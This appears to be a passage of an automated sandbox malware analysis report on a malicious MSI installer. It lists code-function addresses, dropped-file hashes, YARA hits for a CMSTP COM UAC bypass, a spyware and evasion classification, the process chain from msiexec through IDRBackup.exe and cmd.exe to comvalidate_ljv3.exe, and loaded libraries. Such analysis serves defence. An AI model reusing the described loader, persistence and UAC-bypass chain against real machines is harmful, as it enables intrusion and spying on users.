                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014001339010_2_0000000140013390
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_0000000140020BB810_2_0000000140020BB8
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014000142410_2_0000000140001424
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_0000000140008C3C10_2_0000000140008C3C
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014000545010_2_0000000140005450
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014000D45810_2_000000014000D458
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014011B45010_2_000000014011B450
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014001048C10_2_000000014001048C
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00000001400EE4C410_2_00000001400EE4C4
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00000001400FC53C10_2_00000001400FC53C
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014000A5E010_2_000000014000A5E0
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_0000000140022E3010_2_0000000140022E30
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014002267C10_2_000000014002267C
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014001AE8810_2_000000014001AE88
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_0000000140011EF410_2_0000000140011EF4
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00000001400FF71410_2_00000001400FF714
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014001DF4410_2_000000014001DF44
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_0000000140040F4810_2_0000000140040F48
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014001879010_2_0000000140018790
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C434255010_2_00007FF6C4342550
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C434174010_2_00007FF6C4341740
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C4331DB510_2_00007FF6C4331DB5
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C433F61010_2_00007FF6C433F610
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C43345C810_2_00007FF6C43345C8
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C4331DB510_2_00007FF6C4331DB5
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C4340DE710_2_00007FF6C4340DE7
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C4335E6010_2_00007FF6C4335E60
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C433370010_2_00007FF6C4333700
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C4333F0010_2_00007FF6C4333F00
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C433EEE010_2_00007FF6C433EEE0
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C43EB79010_2_00007FF6C43EB790
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C441077010_2_00007FF6C4410770
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C433EFF710_2_00007FF6C433EFF7
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C434100010_2_00007FF6C4341000
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C43437D810_2_00007FF6C43437D8
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C434486010_2_00007FF6C4344860
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C436A86010_2_00007FF6C436A860
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C434087010_2_00007FF6C4340870
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C433C87010_2_00007FF6C433C870
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C45700F010_2_00007FF6C45700F0
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C434118010_2_00007FF6C4341180
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C433F9A010_2_00007FF6C433F9A0
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C433917010_2_00007FF6C4339170
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C43319FA10_2_00007FF6C43319FA
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C4333A1010_2_00007FF6C4333A10
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C433E1C010_2_00007FF6C433E1C0
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C441029010_2_00007FF6C4410290
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C433F25010_2_00007FF6C433F250
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C433FAF010_2_00007FF6C433FAF0
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C43412F010_2_00007FF6C43412F0
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C434138C10_2_00007FF6C434138C
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C4332B8E10_2_00007FF6C4332B8E
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C4338BB010_2_00007FF6C4338BB0
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C433C3B010_2_00007FF6C433C3B0
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C43443B010_2_00007FF6C43443B0
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C433534010_2_00007FF6C4335340
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C43343F010_2_00007FF6C43343F0
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C456FCA010_2_00007FF6C456FCA0
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C4333C9010_2_00007FF6C4333C90
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C433E49010_2_00007FF6C433E490
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C436A45010_2_00007FF6C436A450
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C4332C5410_2_00007FF6C4332C54
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C433FC7010_2_00007FF6C433FC70
                      Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe 5AE3838D77C2102766538F783D0A4B4205E7D2CDBA4E0AD2AB332DC8AB32FEA9
                      Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Aplanogamete\datastate.dll 86C75285D2E51B8E5BA2191C6B1888BBE69437B767E19C530771C08F6FAC7C46
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe Code function: String function: 00007FF6C4339170 appears 35 times
                      Source: comvalidate_ljv3.exe.7.dr Static PE information: Resource name: ZIP type: Zip archive data (empty)
                      Source: wqosufsc.7.dr Static PE information: Number of sections : 12 > 10
                      Source: ikltbdky.19.dr Static PE information: Number of sections : 12 > 10
                      Source: sqlite3.dll.1.dr Static PE information: Number of sections : 18 > 10
                      Source: sqlite3.dll.2.dr Static PE information: Number of sections : 18 > 10
                      Source: 12.2.cmd.exe.30f07f8.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 10.2.comvalidate_ljv3.exe.26d86ed.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 7.2.cmd.exe.49afa00.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 21.2.comvalidate_ljv3.exe.262baed.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 19.2.cmd.exe.4c48acd.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 12.2.cmd.exe.50a76cd.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 12.2.cmd.exe.5061a00.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 21.2.comvalidate_ljv3.exe.25e6a20.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 7.2.cmd.exe.49f56cd.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 21.2.comvalidate_ljv3.exe.262c6ed.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 12.2.cmd.exe.50a6acd.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 19.2.cmd.exe.4c496cd.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 10.2.comvalidate_ljv3.exe.26d7aed.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 10.2.comvalidate_ljv3.exe.2692a20.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 7.2.cmd.exe.49f4acd.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 19.2.cmd.exe.4c03a00.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: classification engine, Classification label: mal100.spyw.expl.evad.winMSI@21/48@1/1
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Code function: 2_2_5001D4C4 GetDiskFreeSpaceW,@System@@_llmul$qqrv,@System@@_llmul$qqrv,2_2_5001D4C4
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Code function: 10_2_0000000140008824 CoCreateInstance,#8,#9,#9,#9,#9,#9,#9,10_2_0000000140008824
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Code function: 2_2_5000C2EC GetModuleFileNameW,@System@LoadResourceModule$qqrpbo,2_2_5000C2EC
                      Source: C:\Windows\System32\msiexec.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\CML550.tmp
                      Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03
                      Source: C:\Windows\System32\msiexec.exe, File created: C:\Windows\TEMP\~DFF582E36EF7EDD896.TMP
                      Source: Yara match, File source: 2.2.IDRBackup.exe.50000000.7.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, type: MEMORY
                      Source: Yara match, File source: C:\Users\user\AppData\Roaming\toolsync_RO\rtl120.bpl, type: DROPPED
                      Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\Aplanogamete\rtl120.bpl, type: DROPPED
                      Source: C:\Windows\SysWOW64\cmd.exe, File read: C:\Users\desktop.ini
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: IDRBackup.exe, 00000002.00000002.1821508917.0000000061E98000.00000002.00000001.01000000.00000009.sdmp, Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: IDRBackup.exe, 00000002.00000002.1821508917.0000000061E98000.00000002.00000001.01000000.00000009.sdmp, Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: IDRBackup.exe, 00000002.00000002.1821508917.0000000061E98000.00000002.00000001.01000000.00000009.sdmp, Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: IDRBackup.exe, 00000002.00000002.1821508917.0000000061E98000.00000002.00000001.01000000.00000009.sdmp, Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: IDRBackup.exe, 00000002.00000002.1821508917.0000000061E98000.00000002.00000001.01000000.00000009.sdmp, Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: IDRBackup.exe, 00000002.00000002.1821508917.0000000061E98000.00000002.00000001.01000000.00000009.sdmp, Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: IDRBackup.exe, 00000002.00000002.1821508917.0000000061E98000.00000002.00000001.01000000.00000009.sdmp, Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: ONHQNHFT.msi, Static file information: TRID: Microsoft Windows Installer (60509/1) 88.31%
                      Source: ONHQNHFT.msi, ReversingLabs: Detection: 13%
                      Source: ONHQNHFT.msi, Virustotal: Detection: 12%
                      Source: comvalidate_ljv3.exe, String found in binary or memory: -install -runas
                      Source: comvalidate_ljv3.exe, String found in binary or memory: -install
                      Source: comvalidate_ljv3.exe, String found in binary or memory: -install -nolisense
                      Source: unknown, Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\ONHQNHFT.msi"
                      Source: unknown, Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                      Source: C:\Windows\System32\msiexec.exe, Process created: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe "C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Process created: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                      Source: unknown, Process created: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe "C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe"
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknown, Process created: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe "C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe"
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                      Source: C:\Windows\System32\msiexec.exe, Process created: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe "C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Process created: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: apphelp.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: aclayers.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: sfc.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: sfc_os.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: msi.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: srpapi.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: tsappcmp.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: textinputframework.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: coreuicomponents.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: coremessaging.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: ntmarta.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: coremessaging.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: wintypes.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: wintypes.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: wintypes.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: windows.storage.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: wldp.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: propsys.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: textshaping.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: netapi32.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: wkscli.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: netutils.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: version.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: mscoree.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: profapi.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: sspicli.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: msihnd.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: pcacli.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: mpr.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: apphelp.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: aclayers.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: sfc.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: sfc_os.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: msi.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: tsappcmp.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: userenv.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: profapi.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: sspicli.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: netapi32.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: wkscli.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: netutils.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: srclient.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: spp.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: powrprof.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: vssapi.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: vsstrace.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: umpdc.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: wldp.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: mscoree.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: version.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: rstrtmgr.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: ncrypt.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: ntasn1.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: windows.storage.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: pcacli.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: mpr.dll
                      Source: C:\Windows\System32\msiexec.exe, Section loaded: cabinet.dll
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Section loaded: msimg32.dll
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Section loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Section loaded: sqlite3.dll
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Section loaded: datastate.dll
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Section loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Section loaded: mpr.dll
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Section loaded: wsock32.dll
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Section loaded: oleacc.dll
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Section loaded: wsock32.dll
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Section loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Section loaded: oledlg.dll
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Section loaded: mpr.dll
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Section loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Section loaded: dbghelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Section loaded: pla.dll
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Section loaded: pdh.dll
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Section loaded: tdh.dll
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Section loaded: cabinet.dll
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Section loaded: wevtapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Section loaded: shdocvw.dll
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Section loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe, Section loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: msimg32.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: sqlite3.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: wsock32.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: datastate.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: mpr.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: wsock32.dll
